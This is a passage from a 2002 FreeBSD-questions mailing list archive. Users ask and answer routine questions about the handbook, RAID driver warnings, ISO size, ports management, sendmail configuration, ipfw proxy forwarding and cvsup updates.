>I will like to use freeBSD after being introduced to >it by a friend, but I will like to know which of the >books you would recommend for a beginer as well as an >advanced user and also how to get this book. >Are the books also free or do I have to pay for them? > >I need a book that will take me from the elimentary to >the advanced stage as I have not used it before. > >Thanks. > >Esan, O. K. (Engr.) > >__________________________________________________ >Do You Yahoo!? >Yahoo! - Official partner of 2002 FIFA World Cup >http://fifaworldcup.yahoo.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > I think that the best way to start in FreeBSD is the handbook http://www.freebsd.org/handbook Also check articles from the following http://www.bsdvault.net http://www.onlamp.com/bsd http://www.daemonnews.org and of course this list is the real thing. HTH Gerardo P.S. If this is html, I apologize, I just switch to Netscape 6 Mail client and still don't know if I get it configured properly. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 9:50:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.targetnet.com (smtp.targetnet.com [205.150.0.125]) by hub.freebsd.org (Postfix) with ESMTP id F41FB37B410 for ; Wed, 26 Jun 2002 09:49:43 -0700 (PDT) Received: from tim by smtp.targetnet.com with local (Exim 3.16 #1) id 17NFz8-0003Ay-00 for freebsd-questions@freebsd.org; Wed, 26 Jun 2002 12:49:38 -0400 To: freebsd-questions@freebsd.org Subject: mly driver and acceleraid 352 sense code warnings - help! Message-Id: From: Tim Strike Date: Wed, 26 Jun 2002 12:49:38 -0400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG We just installed a drive array that used to be on Windows 2000 onto a new FreeBSD 4.5 Release system using a new Acceleraid 352. We've used these raid cards prior to this with older versions of BSD. The drive array appears to be OK, but we're getting the following kernel messages: mly0: physical device 1:12 sense data received mly0: sense key 11 asc 47 ascq 00 mly0: info 00000000 csi 00000000 : : mly0: physical device 1:8 sense data received mly0: sense key 11 asc 47 ascq 00 mly0: info 00000000 csi 00000000 ... and those repeat every so often for just about every device (1:8 through 1:15). The '11' appears to mean command aborted, but I'm at a loss as to figure out how to correct this problem. Any ideas / potential solutions? up-301# uname -a FreeBSD up-301.x 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jun 10 16:46:00 GMT 2002 root@:/usr/src/sys/compile/kernel.conf i386 Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 9:54: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hostname.org (200-161-76-110.dsl.telesp.net.br [200.161.76.110]) by hub.freebsd.org (Postfix) with SMTP id 41F3D37B400 for ; Wed, 26 Jun 2002 09:54:00 -0700 (PDT) Received: from hostname.org [192.168.1.2] by core.hostname.org Message-ID: <3D19F1A4.6070206@hostname.org> Date: Wed, 26 Jun 2002 13:53:56 -0300 From: Fabio Yasusi Yamamoto User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-questions@FreeBSD.ORG Subject: IP TOS bit on freebsd? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi! How can i set the TOS bits on freebsd? i use Ipf and altq. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 9:54:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (f14.law8.hotmail.com [216.33.241.14]) by hub.freebsd.org (Postfix) with ESMTP id 3C0F837B400 for ; Wed, 26 Jun 2002 09:54:45 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 26 Jun 2002 09:54:45 -0700 Received: from 61.11.77.55 by lw8fd.law8.hotmail.msn.com with HTTP; Wed, 26 Jun 2002 16:54:44 GMT X-Originating-IP: [61.11.77.55] From: "Ganesh Kumar" To: wmoran@potentialtech.com Cc: freebsd-questions@freebsd.org Subject: Re: ISO file huuuge ! Date: Wed, 26 Jun 2002 16:54:44 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 26 Jun 2002 16:54:45.0157 (UTC) FILETIME=[2C7A2D50:01C21D32] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I removed the "all other lang." support except english.thats it.nothing else has been removed from the 4.5 distro.Is it possible to make ISO with size lesser than 700Megs. regards Ganesh Kumar >From: Bill Moran >To: Ganesh Kumar >CC: freebsd-questions@freebsd.org >Subject: Re: ISO file huuuge ! >Date: Tue, 25 Jun 2002 23:10:58 -0400 >MIME-Version: 1.0 >Received: from infinity.aesredfish.net ([65.168.0.12]) by hotmail.com with >Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 20:03:27 -0700 >Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com >[65.168.1.181])by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id >g5Q34er09271;Tue, 25 Jun 2002 23:04:40 -0400 >Message-ID: <3D1930C2.6030007@potentialtech.com> >User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) >Gecko/20020502 >X-Accept-Language: en-us, en >References: >Return-Path: wmoran@potentialtech.com >X-OriginalArrivalTime: 26 Jun 2002 03:03:28.0376 (UTC) >FILETIME=[0B995F80:01C21CBE] > >Ganesh Kumar wrote: >>Hi, >>I created a ISO with mkisofs command.But the size is now >>1024MB(vannila,rockridge and jolleit) which will hardly fit in to a normal >>CD. >> >>I would like to give this to the Windows users for installation. >> >>So shall I give only roockridge and jolliet ? Will they be able to install >>on that ? > >If it's only for Windows users, you don't need Rockridge, just Joliet. >But I doubt that alone is going to make your .iso small enough. I >would scan through the files you're burning into this and see if there >are any that you can do without. The largest CD I've ever seen is >750meg, which means you need to clean out about 250meg. > > >-- >Bill Moran >Potential Technologies >http://www.potentialtech.com _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10: 5: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from pcwin002.win.tue.nl (pcwin002.win.tue.nl [131.155.71.72]) by hub.freebsd.org (Postfix) with ESMTP id E364137B40B for ; Wed, 26 Jun 2002 10:04:26 -0700 (PDT) Received: from pcwin002.win.tue.nl (orb_rules@localhost [127.0.0.1]) by pcwin002.win.tue.nl (8.12.3/8.12.3) with ESMTP id g5QH4PNi060040; Wed, 26 Jun 2002 19:04:25 +0200 (CEST) (envelope-from stijn@pcwin002.win.tue.nl) Received: (from stijn@localhost) by pcwin002.win.tue.nl (8.12.3/8.12.3/Submit) id g5QH4Pbc060039; Wed, 26 Jun 2002 19:04:25 +0200 (CEST) Date: Wed, 26 Jun 2002 19:04:25 +0200 From: Stijn Hoop To: Kim Scarborough Cc: freebsd-questions@freebsd.org Subject: Re: Getting rid of userland junk Message-ID: <20020626170425.GB59836@pcwin002.win.tue.nl> References: <006201c21d23$c05fa630$23638780@uchicago.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="zx4FCpZtqtKETZ7O" Content-Disposition: inline In-Reply-To: <006201c21d23$c05fa630$23638780@uchicago.edu> User-Agent: Mutt/1.4i X-Bright-Idea: Let's abolish HTML mail! Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --zx4FCpZtqtKETZ7O Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jun 26, 2002 at 10:11:30AM -0500, Kim Scarborough wrote: > I'd like to strip FreeBSD down as much as possible on a few boxes. I have= all > the stuff I don't want, like sendmail, ssh, and uucp, disabled in make.co= nf, > so the buildworld doesn't bother with them, which is good... but is there= an > easy way to figure out what I can delete now? There seems to be no good w= ay to > actually remove these components; one can only stop them from being updat= ed. > Is there a master packing list somewhere, or do I just need to navigate > through all the Makefiles? Well, you could do an installworld and then go through the various system directories like /bin, /usr/bin etc. to see which files have changed and which didn't - obviously the ones that didn't will not be needed anymore. ls -ltr is a handy tool, find(1) should also be able to help you. I've been doing this on a semi-regular basis with my tracking of -STABLE; there's a lot of cruft left over if you don't do something like this. HTH, --Stijn --=20 The right half of the brain controls the left half of the body. This means that only left handed people are in their right mind. --zx4FCpZtqtKETZ7O Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GfQZY3r/tLQmfWcRAiwkAKCk51DJ/O393/0AKsBirU633YK9lACgtr+l s/XudTqjp5lIeM2ntFsO/1M= =VV8L -----END PGP SIGNATURE----- --zx4FCpZtqtKETZ7O-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10: 8:48 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mxout3.netvision.net.il (mxout3.netvision.net.il [194.90.9.24]) by hub.freebsd.org (Postfix) with ESMTP id B652F37B440 for ; Wed, 26 Jun 2002 10:07:23 -0700 (PDT) Received: from holy.durdom.org ([212.143.44.152]) by mxout3.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.6 (built Jun 11 2002)) with ESMTP id <0GYB0011COX0XW@mxout3.netvision.net.il> for freebsd-questions@FreeBSD.ORG; Wed, 26 Jun 2002 20:07:50 +0300 (IDT) Received: from holy.durdom.org (localhost.durdom.org [127.0.0.1]) by holy.durdom.org (8.12.4/8.12.3) with ESMTP id g5QK5sU8012681 for ; Wed, 26 Jun 2002 20:05:55 +0000 (envelope-from serg@holy.durdom.org) Received: (from serg@localhost) by holy.durdom.org (8.12.4/8.12.4/Submit) id g5QK5jp2012680 for freebsd-questions@FreeBSD.ORG; Wed, 26 Jun 2002 20:05:45 +0000 (GMT) Date: Wed, 26 Jun 2002 20:05:45 +0000 From: Serg Senyko Subject: Samba-2.2.5 and recycle.so To: freebsd-questions@FreeBSD.ORG Message-id: <20020626200545.GA12665@holy.durdom.org> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Content-disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi --- log --- [2002/06/26 20:02:10, 0] smbd/vfs.c:vfs_init_custom(142) Error opening /usr/local/lib/samba/recycle.so: /usr/local/lib/samba/recycle.so: Undefined symbol "StrCaseCmp" --- log --- why ? -- mail to: holy@mail.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:26: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from astnet.astelit.ru (astnet.astelit.ru [195.96.64.250]) by hub.freebsd.org (Postfix) with ESMTP id 8085637B5AF for ; Wed, 26 Jun 2002 10:24:38 -0700 (PDT) Received: from 195.96.69.5 ([195.96.69.5]) by astnet.astelit.ru (8.12.2/8.12.2) with ESMTP id g5QHOffN053195 for ; Wed, 26 Jun 2002 21:24:43 +0400 (MSD) Date: Wed, 26 Jun 2002 21:24:02 +0400 From: Alexander Isaev X-Mailer: The Bat! (v1.60q) Reply-To: Alexander Isaev X-Priority: 3 (Normal) Message-ID: <1508179687.20020626212402@astelit.ru> To: questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:29:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from astnet.astelit.ru (astnet.astelit.ru [195.96.64.250]) by hub.freebsd.org (Postfix) with ESMTP id 6C32B37B401 for ; Wed, 26 Jun 2002 10:29:29 -0700 (PDT) Received: from 195.96.69.5 ([195.96.69.5]) by astnet.astelit.ru (8.12.2/8.12.2) with ESMTP id g5QHTYfN053549 for ; Wed, 26 Jun 2002 21:29:35 +0400 (MSD) Date: Wed, 26 Jun 2002 21:28:55 +0400 From: Alexander Isaev X-Mailer: The Bat! (v1.60q) Reply-To: Alexander Isaev X-Priority: 3 (Normal) Message-ID: <1448472443.20020626212855@astelit.ru> To: questions@FreeBSD.ORG Subject: unsubscribe MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:30:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from rambo.simx.org (rambo.simx.org [80.65.205.166]) by hub.freebsd.org (Postfix) with ESMTP id 118CA37B400 for ; Wed, 26 Jun 2002 10:30:15 -0700 (PDT) Received: from rambo.simx.org (roadrunner [192.168.0.5]) by rambo.simx.org (8.12.3/8.12.3) with ESMTP id g5QHTvSa039155; Wed, 26 Jun 2002 19:29:59 +0200 (CEST) (envelope-from listsub@rambo.simx.org) Message-ID: <3D19F98F.7060704@rambo.simx.org> Date: Wed, 26 Jun 2002 19:27:43 +0200 From: Rocky User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020622 X-Accept-Language: en-us, en MIME-Version: 1.0 To: David Kramer Cc: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG David Kramer wrote: >On Wed, 26 Jun 2002, Paul Everlund wrote: > > > >>On Wed, 26 Jun 2002, David Kramer wrote: >> >> >> >>>I have to go through the collection of ports and make sure everything I >>>need is there, but I'm sure it is. BTW, is there a way to check what >>>software is installed on your box? Is there an automated way of >>>uninstalling ports? I couldn't find this info on freebsd.org. >>> >>> >>Take a closer look at pkg_info, pkg_delete and pkg_add. You can also >> >> > >I thought ports and packages were two different things. But if packages >can me managed as explained above, and ports can be managed as explained >below, then my concerns are covered. > > > >>delete an installed port by going to /usr/ports/*category*/*app*/, >>then make deinstall. >> >> > >THANK YOU!!!! This was another thread on the BLU mailing list recently. >I said that if Makefiles had a "make uninstall" to undo "make install", I >would be much more likely to use them than RPM's, as I am opposed to >management tools that track their information in databases that >require a special application to view and change, instead of text files, >which can be managed any way one wants. > >Do most ports have a "make deinstall" option? > > AFAIK, all ports have a "make deinstall". Other make targets that you could try in the ports three includes, but are not limited to; fetch, configure, clean, distclean, reinstall, or just simply "make" without target. Most of them are self explainatory, unless maybe clean and distclean. Basically, make clean removes leftovers from previous builds or maybe a failed compile, while distclean erases the .tgz that are downloaded and stored in /usr/ports/distclean. And just to clearify my previous wish to kill the thread: I was reffering to the "long live the penguin" posts that was more of a "linux rulez, bsd sucks" or vice versa discussion. As long as it contains questions, facts or comments on BSD I dont mind it at all. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:31:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from astnet.astelit.ru (astnet.astelit.ru [195.96.64.250]) by hub.freebsd.org (Postfix) with ESMTP id BF99837B405 for ; Wed, 26 Jun 2002 10:31:10 -0700 (PDT) Received: from 195.96.69.5 ([195.96.69.5]) by astnet.astelit.ru (8.12.2/8.12.2) with ESMTP id g5QHVFfN053647 for ; Wed, 26 Jun 2002 21:31:16 +0400 (MSD) Date: Wed, 26 Jun 2002 21:30:36 +0400 From: Alexander Isaev X-Mailer: The Bat! (v1.60q) Reply-To: Alexander Isaev X-Priority: 3 (Normal) Message-ID: <628573881.20020626213036@astelit.ru> To: freebsd-questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:38:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14401.mail.yahoo.com (web14401.mail.yahoo.com [216.136.174.58]) by hub.freebsd.org (Postfix) with SMTP id 471AB37B401 for ; Wed, 26 Jun 2002 10:38:51 -0700 (PDT) Message-ID: <20020626173848.46342.qmail@web14401.mail.yahoo.com> Received: from [210.53.51.130] by web14401.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 10:38:48 PDT Date: Wed, 26 Jun 2002 10:38:48 -0700 (PDT) From: Qingjia Zhu Subject: Re: sendmail refuse localhost(revisited)? To: Alexander V Zubchenko Cc: gshapiro@FreeBSD.org, freebsd-questions@freebsd.org In-Reply-To: <20020626110835.L12722-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, gurus Because fetchmail in my box works, that is, my sendmail do can receive incoming mails, so I'd like to describe my problem again, I hope somebody can look into this and help me to find the way out(Which config file to modifiy? How?). My box dials up to the Internet. First, I did a complete freshly install(FreeBSD 4.6 release), create two user(root, qjzhu), hostname is not set in /etc/rc.conf, and /etc/hosts contains ::1 localhost localhost.my.domain 127.0.0.1 localhost localhost.my.domain No /etc/mail/relay-domains, no /etc/mail/local-host-names Now it's ok for root to send mail to qjzhu with 'mail' MUA. /var/log/maillog logs > Jun 27 00:35:33 sendmail[122]: g5QGZXnA000122: from=root, size=30, class=0, > nrcpts=1, msgid=<200206261635.g5QGZXnA000122@localhost.my.domain>, relay= > root@localhost > Jun 27 00:35:33 sm-mta[123]:g5QGZXWM000123: from=, > , size=349, class=0, nrcpts=1, msgid=<200206261635.g5QGZXnA000122@localhost. > my.domain>, proto=ESMTP, daemon=MTA, relay=localhost [127.0.0.1] > Jun 27 00:35:33 sendmail[122]: g5QGZXnA000122: to=qjzhu, ctladdr=root > (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, relay=loca > lhost.my.domain. [127.0.0.1], dsn=2.0.0, stat=Sent (g5QGZXWM000123 Message > accepted for delivery) > Jun 27 00:35:33 sm-mta[124]: g5QGZXWM000123: to=, > ctladdr= (0/0), delay=00:00:00, xdelay=00:00:00, > mailer=local, pri=30625, relay=local, dsn=2.0.0, stat=Sent Then, I add hostname="qjzhu.headsun.net" to /etc/rc.conf, change /etc/hosts into 127.0.0.1 localhost qjzhu.headsun.net and in /etc/mail/sendmail.cf I add Cwlocalhost qjzhu.headsun.net Now root is UNABLE to send mail to qjzhu with 'mail' MUA, /var/log/maillog logs > Jun 27 00:42:20 qjzhu sendmail[122]: g5QGgKcm000122: from=root, size=30, > class=0, nrcpts=1, msgid=<200206261642.g5QGgKcm000122@qjzhu.headsun.net>, > relay=root@localhost > Jun 27 00:42:20 qjzhu sendmail[122]: g5QGgKcm000122: to=qjzhu, ctladdr=root > (0/0),delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30025, relay=qjzhu. > headsun.net., dsn=4.0.0, stat=Deferred: Connection refused by qjzhu.headsun. > net. Then I dial up and start fetchmail, sendmail seems ok to receive incoming mails, /var/log/maillog logs: > Jun 27 00:51:28 qjzhu sm-mta[156]: g5QGpEoe000156: from= bsd.org>, size=2610, class=-60, nrcpts=1, msgid=<200206261646.g5QGkoSI00090 > 5@freefall.freebsd.org>, proto=ESMTP, daemon=MTA, relay=localhost[127.0.0.1] > Jun 27 00:51:28 qjzhu sm-mta[175]: g5QGpEoe000156: to=, del > ay=00:00:00, xdelay=00:00:00, mailer=local, pri=140821, relay=local, dsn=2.0 > .0, stat=Sent So, what's the reason of "connection refused"? How to resolve? Can anybody explain the logs? Please shed some light on it. Thanks. >Alexander V Zubchenko wrote: >> Also want to notate: in prev. mail in second case (with 'mail' MUA) >> clearly two moments: >> a) mailer is relay (not local) >> b) this may b just mistype in letter, not in real output, but there r >> relay=localhost.heasun.net not headsun.net >> >> Also i'm not sured it is correct 'Cwlocalhost'. Try to change it to >> real host name or domainname. Other ideas some later...:) __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:42: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from malkav.snowmoon.com (malkav.snowmoon.com [209.23.60.62]) by hub.freebsd.org (Postfix) with SMTP id BB18437B416 for ; Wed, 26 Jun 2002 10:41:23 -0700 (PDT) Received: (qmail 1967 invoked from network); 26 Jun 2002 17:41:11 -0000 Received: from localhost.snowmoon.com (HELO localhost) (127.0.0.1) by localhost.snowmoon.com with SMTP; 26 Jun 2002 17:41:11 -0000 Date: Wed, 26 Jun 2002 13:41:11 -0400 (EDT) From: Jaime To: freebsd-questions@freebsd.org Subject: Bridge and proxy? Message-ID: <20020626133540.F1925-100000@malkav.snowmoon.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I'm trying to set up a FreeBSD 4.6 system for bridging and as a transparent HTTP proxy. I have the squid (tcp port 3128) and dansguardian (tcp port 8080) ports installed and running well. I have bridging in the kernel and it is running well. The topology is: (ISP) -- (Router) -- (FBSD 4.6) -- (LAN's core switch) I have it working well enough that HTTP requests to port 80 are passing through the FreeBSD box and working correctly. However, they are not going into DansGuardian (which passes the request to Squid). I'm using the following IPFW rules: cerberus# ipfw list 00100 allow ip from any to any via lo0 00200 deny ip from any to 127.0.0.0/8 00300 deny ip from 127.0.0.0/8 to any 01000 allow tcp from me to any 01100 allow tcp from any to me 80 01200 fwd 127.0.0.1,8080 tcp from any to any 80 01210 fwd 127.0.0.1,8080 tcp from any to any 8080 01220 fwd 127.0.0.1,8080 tcp from any to any 81 01230 fwd 127.0.0.1,8080 tcp from any to any 8000 65000 allow ip from any to any 65535 allow ip from any to any Any advice? Thanks in advance, Jaime To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 10:50: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 6CD1737B401 for ; Wed, 26 Jun 2002 10:49:51 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5QHnbr18864; Wed, 26 Jun 2002 13:49:38 -0400 Message-ID: <3D1A002B.3080500@potentialtech.com> Date: Wed, 26 Jun 2002 13:55:55 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ganesh Kumar Cc: freebsd-questions@freebsd.org Subject: Re: ISO file huuuge ! References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ganesh Kumar wrote: > I removed the "all other lang." support except english.thats it.nothing > else has been removed from the 4.5 distro.Is it possible to make ISO > with size lesser than 700Megs. I don't know what you're asking. If you want an ISO of the 4.5 distro, just download it from ftp.freebsd.org If you are trying to burn a custom ISO of something and it's too big, you need to not include so much data in the burn. > > > regards > Ganesh Kumar > > > > > >> From: Bill Moran >> To: Ganesh Kumar >> CC: freebsd-questions@freebsd.org >> Subject: Re: ISO file huuuge ! >> Date: Tue, 25 Jun 2002 23:10:58 -0400 >> MIME-Version: 1.0 >> Received: from infinity.aesredfish.net ([65.168.0.12]) by hotmail.com >> with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 20:03:27 -0700 >> Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com >> [65.168.1.181])by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP >> id g5Q34er09271;Tue, 25 Jun 2002 23:04:40 -0400 >> Message-ID: <3D1930C2.6030007@potentialtech.com> >> User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) >> Gecko/20020502 >> X-Accept-Language: en-us, en >> References: >> Return-Path: wmoran@potentialtech.com >> X-OriginalArrivalTime: 26 Jun 2002 03:03:28.0376 (UTC) >> FILETIME=[0B995F80:01C21CBE] >> >> Ganesh Kumar wrote: >> >>> Hi, >>> I created a ISO with mkisofs command.But the size is now >>> 1024MB(vannila,rockridge and jolleit) which will hardly fit in to a >>> normal CD. >>> >>> I would like to give this to the Windows users for installation. >>> >>> So shall I give only roockridge and jolliet ? Will they be able to >>> install on that ? >> >> >> If it's only for Windows users, you don't need Rockridge, just Joliet. >> But I doubt that alone is going to make your .iso small enough. I >> would scan through the files you're burning into this and see if there >> are any that you can do without. The largest CD I've ever seen is >> 750meg, which means you need to clean out about 250meg. >> >> >> -- >> Bill Moran >> Potential Technologies >> http://www.potentialtech.com > > > > > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:10:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id 55D2037B401 for ; Wed, 26 Jun 2002 11:10:16 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id 9300C36F9; Wed, 26 Jun 2002 12:27:15 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17NHF7-00036p-00; Wed, 26 Jun 2002 12:10:13 -0600 Date: Wed, 26 Jun 2002 12:10:13 -0600 From: David Wilk To: Darren Pilgrim Cc: FreeBSD-Questions Subject: Re: Updating my ports tree? Message-ID: <20020626121013.C10404@cygnus.wks.Gallup.cia-g.com> Mail-Followup-To: David Wilk , Darren Pilgrim , FreeBSD-Questions References: <3D19267F.8A2FCFE5@pantherdragon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D19267F.8A2FCFE5@pantherdragon.org>; from dmp@pantherdragon.org on Tue, Jun 25, 2002 at 07:27:11PM -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Darren, I'm about to start the same process, and being new to FreeBSD, was wondering what you did and how it worked out for you. thanks, Dave On Tue, Jun 25, 2002 at 07:27:11PM -0700 or thereabouts, Darren Pilgrim wrote: > Aaron Burke wrote: > > > > > -----Original Message----- > > > From: owner-freebsd-questions@FreeBSD.ORG > > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Darren Pilgrim > > > Sent: Tuesday, June 25, 2002 06:16 PM > > > To: freebsd-questions@FreeBSD.ORG > > > Subject: Updating my ports tree? > > > > > > > > > I have a 4.5-R machine for which I'd like to update my ports tree. > > > I really just want the current openssh-portable port, but I figure I > > > might as well update the whole tree while I'm at it. Do I need to > > > fetch the tree for -stable, or do I just fetch it from the default in > > > the example supfile (which is .)? > > > > They are not the same supfiles. Also the ports are constantly changing. > > I use the supfile from /usr/share/examples/cvsup/ports-supfile. The only > > thing that needs changing is the cvsup server. I also copied this file > > to /root. Just make the changes and run > > "cvsup -g -L 2 /root/ports-supfile" to get the new ports installed. > > Thanks for your reply, but I managed to get it to work before anyone > 